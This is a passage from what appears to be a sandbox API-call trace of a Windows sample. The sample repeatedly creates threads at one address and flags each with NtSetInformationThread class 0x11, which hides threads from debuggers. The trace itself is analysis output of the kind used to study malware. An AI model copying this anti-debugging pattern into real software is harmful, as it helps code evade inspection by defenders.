ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.783] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x684, lpBytesBuffer=0x0) returned 0x0 [0090.783] NtSetInformationThread (ThreadHandle=0x684, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.784] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x688, lpBytesBuffer=0x0) returned 0x0 [0090.784] NtSetInformationThread (ThreadHandle=0x688, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.784] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x68c, lpBytesBuffer=0x0) returned 0x0 [0090.785] NtSetInformationThread (ThreadHandle=0x68c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.785] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x690, lpBytesBuffer=0x0) returned 0x0 [0090.786] NtSetInformationThread (ThreadHandle=0x690, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.786] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x694, lpBytesBuffer=0x0) returned 0x0 [0090.787] NtSetInformationThread (ThreadHandle=0x694, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.787] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x698, lpBytesBuffer=0x0) returned 0x0 [0090.788] NtSetInformationThread (ThreadHandle=0x698, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.788] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x69c, lpBytesBuffer=0x0) returned 0x0 [0090.788] NtSetInformationThread (ThreadHandle=0x69c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.788] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6a0, lpBytesBuffer=0x0) returned 0x0 [0090.789] NtSetInformationThread (ThreadHandle=0x6a0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.789] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6a4, lpBytesBuffer=0x0) returned 0x0 [0090.790] NtSetInformationThread (ThreadHandle=0x6a4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.790] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6a8, lpBytesBuffer=0x0) returned 0x0 [0090.791] NtSetInformationThread (ThreadHandle=0x6a8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.791] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6ac, lpBytesBuffer=0x0) returned 0x0 [0090.792] NtSetInformationThread (ThreadHandle=0x6ac, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.792] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6b0, lpBytesBuffer=0x0) returned 0x0 [0090.793] NtSetInformationThread (ThreadHandle=0x6b0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.793] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6b4, lpBytesBuffer=0x0) returned 0x0 [0090.794] NtSetInformationThread (ThreadHandle=0x6b4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.794] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6b8, lpBytesBuffer=0x0) returned 0x0 [0090.795] NtSetInformationThread (ThreadHandle=0x6b8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.795] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6bc, lpBytesBuffer=0x0) returned 0x0 [0090.795] NtSetInformationThread (ThreadHandle=0x6bc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.795] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6c0, lpBytesBuffer=0x0) returned 0x0 [0090.796] NtSetInformationThread (ThreadHandle=0x6c0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.796] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6c4, lpBytesBuffer=0x0) returned 0x0 [0090.797] NtSetInformationThread (ThreadHandle=0x6c4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.797] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6c8, lpBytesBuffer=0x0) returned 0x0 [0090.798] NtSetInformationThread (ThreadHandle=0x6c8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.798] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6cc, lpBytesBuffer=0x0) returned 0x0 [0090.800] NtSetInformationThread (ThreadHandle=0x6cc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.800] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6d0, lpBytesBuffer=0x0) returned 0x0 [0090.801] NtSetInformationThread (ThreadHandle=0x6d0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.801] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6d4, lpBytesBuffer=0x0) returned 0x0 [0090.802] NtSetInformationThread (ThreadHandle=0x6d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.802] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6d8, lpBytesBuffer=0x0) returned 0x0 [0090.803] NtSetInformationThread (ThreadHandle=0x6d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.803] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6dc, lpBytesBuffer=0x0) returned 0x0 [0090.803] NtSetInformationThread (ThreadHandle=0x6dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.803] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6e0, lpBytesBuffer=0x0) returned 0x0 [0090.804] NtSetInformationThread (ThreadHandle=0x6e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.804] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6e4, lpBytesBuffer=0x0) returned 0x0 [0090.805] NtSetInformationThread (ThreadHandle=0x6e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.805] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6e8, lpBytesBuffer=0x0) returned 0x0 [0090.806] NtSetInformationThread (ThreadHandle=0x6e8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.806] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6ec, lpBytesBuffer=0x0) returned 0x0 [0090.807] NtSetInformationThread (ThreadHandle=0x6ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.807] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6f0, lpBytesBuffer=0x0) returned 0x0 [0090.808] NtSetInformationThread (ThreadHandle=0x6f0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.808] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6f4, lpBytesBuffer=0x0) returned 0x0 [0090.809] NtSetInformationThread (ThreadHandle=0x6f4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.809] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6f8, lpBytesBuffer=0x0) returned 0x0 [0090.810] NtSetInformationThread (ThreadHandle=0x6f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.810] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x6fc, lpBytesBuffer=0x0) returned 0x0 [0090.810] NtSetInformationThread (ThreadHandle=0x6fc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.810] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x700, lpBytesBuffer=0x0) returned 0x0 [0090.811] NtSetInformationThread (ThreadHandle=0x700, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.811] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x704, lpBytesBuffer=0x0) returned 0x0 [0090.812] NtSetInformationThread (ThreadHandle=0x704, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.812] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x708, lpBytesBuffer=0x0) returned 0x0 [0090.813] NtSetInformationThread (ThreadHandle=0x708, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.813] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10d0, lpBytesBuffer=0x0) returned 0x0 [0091.673] NtSetInformationThread (ThreadHandle=0x10d0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.673] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10d4, lpBytesBuffer=0x0) returned 0x0 [0091.674] NtSetInformationThread (ThreadHandle=0x10d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.674] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10d8, lpBytesBuffer=0x0) returned 0x0 [0091.675] NtSetInformationThread (ThreadHandle=0x10d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.675] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10dc, lpBytesBuffer=0x0) returned 0x0 [0091.676] NtSetInformationThread (ThreadHandle=0x10dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.676] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10e0, lpBytesBuffer=0x0) returned 0x0 [0091.677] NtSetInformationThread (ThreadHandle=0x10e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.677] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10e4, lpBytesBuffer=0x0) returned 0x0 [0091.678] NtSetInformationThread (ThreadHandle=0x10e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.678] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10e8, lpBytesBuffer=0x0) returned 0x0 [0091.678] NtSetInformationThread (ThreadHandle=0x10e8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.678] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10ec, lpBytesBuffer=0x0) returned 0x0 [0091.679] NtSetInformationThread (ThreadHandle=0x10ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.679] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10f0, lpBytesBuffer=0x0) returned 0x0 [0091.680] NtSetInformationThread (ThreadHandle=0x10f0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.680] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10f4, lpBytesBuffer=0x0) returned 0x0 [0091.681] NtSetInformationThread (ThreadHandle=0x10f4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.681] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10f8, lpBytesBuffer=0x0) returned 0x0 [0091.682] NtSetInformationThread (ThreadHandle=0x10f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.682] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x10fc, lpBytesBuffer=0x0) returned 0x0 [0091.682] NtSetInformationThread (ThreadHandle=0x10fc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.682] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1100, lpBytesBuffer=0x0) returned 0x0 [0091.683] NtSetInformationThread (ThreadHandle=0x1100, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.683] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1104, lpBytesBuffer=0x0) returned 0x0 [0091.684] NtSetInformationThread (ThreadHandle=0x1104, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.684] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1108, lpBytesBuffer=0x0) returned 0x0 [0091.685] NtSetInformationThread (ThreadHandle=0x1108, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.685] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x110c, lpBytesBuffer=0x0) returned 0x0 [0091.685] NtSetInformationThread (ThreadHandle=0x110c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.685] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1110, lpBytesBuffer=0x0) returned 0x0 [0091.686] NtSetInformationThread (ThreadHandle=0x1110, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.686] NtCreateThreadEx 